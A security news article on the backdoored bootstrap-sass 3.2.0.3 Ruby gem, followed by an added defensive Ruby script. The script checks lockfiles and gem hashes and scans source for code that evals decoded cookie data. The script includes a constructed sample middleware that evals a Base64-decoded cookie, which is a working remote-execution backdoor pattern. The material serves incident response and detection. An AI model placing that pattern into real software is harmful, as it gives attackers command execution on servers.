Bootstrap-Sass v3.2.0.3 Loaded With Malware, Update To 3.2.0.4 ASAP


The popular bootstrap-sass gem, which packages the Bootstrap UI framework for Ruby and Rails projects, shipped malicious code in the release published to RubyGems as version 3.2.0.3. Only that version is affected; earlier releases and the re-published 3.2.0.4 are clean. Security research firm Bad Packets identified backdoor-like code inside the gem that decodes and evaluates attacker-supplied code carried in an HTTP cookie, giving remote command execution on any Rails server running the tampered version. It appears that a maintainer's RubyGems account was compromised and the attacker used that access to publish the malicious release, although this has not been officially confirmed.

Bad Packets' finding was confirmed by Snyk, an open-source security company. Teams from both companies have been examining bootstrap-sass version 3.2.0.3 since March 26, 2019. “On March 26, 2019, a malicious version of the popular bootstrap-sass package, that has been downloaded a total of 28 million times to date, was published to the official RubyGems repository. We assume that the attacker has obtained the credentials to publish the malicious RubyGems package from one of the two maintainers, but this has not been officially confirmed. Version 3.2.0.3 includes a stealthy backdoor that gives attackers remote command execution on server-side Rails applications,” said Liran Tal of Snyk.

Tal goes on to describe how the backdoor was verified. Derek Barnes first raised the alarm about suspicious content in the twbs/bootstrap-sass repository and informed the maintainers and the community about the malicious code. By March 26 at 11:56 PM GMT the project was considered clean, with the malicious version removed by the maintainers. “On the same day, Derek Barnes opened a GitHub issue for the twbs/bootstrap-sass repository that raised an issue related to the malicious version and pointed out a suspicious snippet of code that is bundled with version 3.2.0.3 of bootstrap-sass. The backdoor was wisely hidden in the 3.2.0.3 version that was only published to RubyGems, and no source of the malicious version existed on the GitHub repository; it allowed remote attackers to dynamically execute code on servers hosting the vulnerable versions,” explained Tal.

Tal strongly recommends that anyone running a Rails application that depends on bootstrap-sass update immediately to version 3.2.0.4, the clean release the bootstrap-sass maintainers republished to close the hole. The 27 to 28 million figure quoted above is the package's lifetime download count, not the number of downloads of the backdoored release, which was available on RubyGems for less than a day. The backdoored gem file has a SHA256 checksum of 366d6162fe36fc81dadc114558b43c6c8890c8bcc7e90e2949ae6344d0785dc0; that hash can be used to hunt for cached copies in vendor/cache directories, gem mirrors and build artifacts.
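A set of local checks for this incident, written in Ruby as an added example (this is not code from the article, Snyk, Bad Packets or the bootstrap-sass project): it reads the pinned bootstrap-sass version out of a Gemfile.lock, compares a downloaded gem file's SHA256 against the checksum the article reports, and scans Ruby source for the backdoor's shape, an eval of data that arrived in a cookie. Only the version number and the SHA256 hex come from the article; the sample lockfile and the sample middleware below are constructed for illustration, and the cookie name and class name in them are made up rather than the real backdoor's identifiers.

```ruby
#!/usr/bin/env ruby
# Added example (not from the article or the bootstrap-sass project): three
# local checks a Rails team can run after the bootstrap-sass 3.2.0.3 incident.
#   1. Is the backdoored version pinned in Gemfile.lock?
#   2. Does a local .gem file match the SHA256 the article reports?
#   3. Does any Ruby source eval() data it pulled out of a cookie?
require 'digest'
require 'rubygems'

BACKDOORED_VERSION = Gem::Version.new('3.2.0.3')
FIXED_VERSION      = Gem::Version.new('3.2.0.4')
# SHA256 of the malicious gem file, as reported in the article.
KNOWN_BAD_SHA256 = '366d6162fe36fc81dadc114558b43c6c8890c8bcc7e90e2949ae6344d0785dc0'

# Check 1: the pinned bootstrap-sass version in Gemfile.lock text (nil if absent).
# Only spec lines of the form "bootstrap-sass (x.y.z)" match; dependency
# constraints such as "(~> 3.2.0)" fail the digits-only capture group.
def pinned_bootstrap_sass_version(lockfile_text)
  m = lockfile_text.match(/^\s*bootstrap-sass \((\d+(?:\.\d+)*)\)\s*$/)
  m && Gem::Version.new(m[1])
end

def backdoored_version_pinned?(lockfile_text)
  v = pinned_bootstrap_sass_version(lockfile_text)
  !v.nil? && v == BACKDOORED_VERSION
end

# Check 2: hash a local gem file (e.g. vendor/cache/bootstrap-sass-3.2.0.3.gem)
# and compare it with the published indicator.
def sha256_of_file(path)
  Digest::SHA256.file(path).hexdigest
end

def known_bad_gem?(sha256_hex)
  sha256_hex.downcase == KNOWN_BAD_SHA256
end

# Check 3: heuristic for the backdoor's shape. In a Ruby file that both decodes
# Base64 and reads cookies, report the 1-based line numbers of every eval call.
# It is a triage aid, not proof: review each hit by hand.
def cookie_eval_sites(ruby_source)
  return [] unless ruby_source =~ /Base64/ && ruby_source =~ /cookies\[|HTTP_COOKIE/
  ruby_source.each_line.with_index(1)
             .select { |line, _| line =~ /\beval\s*\(/ }
             .map { |_, n| n }
end

# Constructed Gemfile.lock fragment (not a real project's lockfile).
SAMPLE_LOCKFILE = <<~LOCK
  GEM
    remote: https://rubygems.org/
    specs:
      bootstrap-sass (3.2.0.3)
        autoprefixer-rails (>= 5.2.1)
        sass (>= 3.3.4)
      rails (5.2.2)

  DEPENDENCIES
    bootstrap-sass (~> 3.2.0)
LOCK

# Constructed Rack middleware with the shape the article describes: attacker
# data arrives in a cookie, is Base64-decoded and handed to eval. The class and
# cookie names are made up for this example. Never deploy anything like it.
SAMPLE_SUSPECT_SOURCE = <<~RUBY
  require 'base64'
  class CookieEvalMiddleware
    def initialize(app)
      @app = app
    end
    def call(env)
      payload = Rack::Request.new(env).cookies['session_hint']
      eval(Base64.urlsafe_decode64(payload)) if payload
      @app.call(env)
    end
  end
RUBY

if __FILE__ == $PROGRAM_NAME
  puts "lockfile pins backdoored 3.2.0.3: #{backdoored_version_pinned?(SAMPLE_LOCKFILE)}"
  puts "eval-of-cookie lines in sample source: #{cookie_eval_sites(SAMPLE_SUSPECT_SOURCE).inspect}"
  ARGV.each { |gem_path| puts "#{gem_path}: known bad = #{known_bad_gem?(sha256_of_file(gem_path))}" }
end
```

Run it with the paths of any cached .gem files as arguments to hash-check them; for the lockfile check, pass the contents of your own Gemfile.lock to `backdoored_version_pinned?` instead of the constructed sample. The version check is deliberately exact: only 3.2.0.3 is backdoored, so older pins are not flagged, and anything below 3.2.0.4 that is still 3.2.0.3 is the thing to replace.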

“You can run a one-off test for your open source project by clicking here to test your repositories, or by using our CLI to test your projects locally. If you found out your Rails application is making use of the vulnerable project, take immediate steps to replace the current vulnerable version of 3.2.0.3 with the re-published 3.2.0.4 version as first response mitigation without requiring major version upgrades,” concluded Tal.


Julia Sowells

Julia Sowells is a technology and security professional. Over a decade in technology she has worked on dozens of large-scale enterprise security projects, written technical articles and served as a technical editor for Rural Press Magazine. She now lives and works in New York, where she runs her own consulting firm as a security consultant while continuing to write for Hacker Combat in her limited spare time.
